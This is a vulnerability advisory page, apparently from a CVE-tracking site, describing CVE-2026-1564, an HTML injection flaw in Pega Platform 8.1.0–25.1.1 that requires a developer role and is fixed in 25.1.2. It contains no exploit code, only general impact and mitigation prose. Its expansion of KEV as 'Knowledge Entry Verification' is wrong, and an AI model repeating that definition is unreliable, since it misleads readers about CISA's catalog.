Platform
other
Component
pega-platform
Fixed in
25.1.2
CVE-2026-1564 describes an HTML Injection vulnerability discovered within the Pega Platform. This flaw allows an attacker, possessing a high privileged user account with a developer role, to inject malicious HTML into the application. The vulnerability affects versions 8.1.0 through 25.1.1 of the Pega Platform, and a patch is available in version Infinity 25.1.2.
CVE-2026-1564 impacts Pega Infinity and Pega Platform versions 8.1.0 through 25.1.1. This HTML Injection vulnerability allows an attacker with elevated privileges and a developer role to inject malicious HTML code into the application's user interface. Successful exploitation could result in manipulation of the application's appearance, execution of malicious scripts in a user's browser, theft of sensitive information, or even control of the application. The severity of this vulnerability lies in the need for a privileged user, but the potential impact on the confidentiality, integrity, and availability of data is significant. Applying the security update is crucial to mitigate this risk.
This vulnerability requires the attacker to have a developer role and elevated privileges within the Pega system. This limits the scope of exploitation to internal users or those who have compromised an account with these privileges. HTML injection can be achieved by manipulating input parameters in the user interface, such as text fields or forms. Once the malicious code is injected, it executes in the user's browser, allowing the attacker to perform various actions, such as stealing cookies, redirecting the user to malicious websites, or modifying the page content. The complexity of exploitation depends on the attacker's knowledge of the Pega application architecture and HTML injection techniques.
Exploit Status
EPSS
0.06% (18% percentile)
CISA SSVC
The recommended solution to address CVE-2026-1564 is to upgrade to Pega Infinity 25.1.2 or a later version. This update includes the necessary fixes to prevent HTML injection. In the meantime, as a temporary mitigation, restrict access to development functions to trusted users and carefully review any user-provided data before displaying it in the user interface. Implementing robust security policies and conducting periodic security audits are essential practices to protect against this type of vulnerability. The absence of a KEV (Knowledge Entry Verification) indicates that information may be limited and monitoring official Pega sources for updates is recommended.
Actualice Pega Platform a la versión 25.1.2 o posterior para mitigar la vulnerabilidad de inyección de HTML. Consulte la nota de remediación de seguridad de Pegasystems para obtener instrucciones detalladas sobre cómo aplicar la corrección y verificar la mitigación.
Vulnerability analysis and critical alerts directly to your inbox.
Pega Platform versions 8.1.0 through 25.1.1 are vulnerable.
A user with elevated privileges and a developer role.
Upgrade to Pega Infinity 25.1.2 or a later version.
Restrict access to development functions and carefully review user-provided data.
No, there is currently no KEV available.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.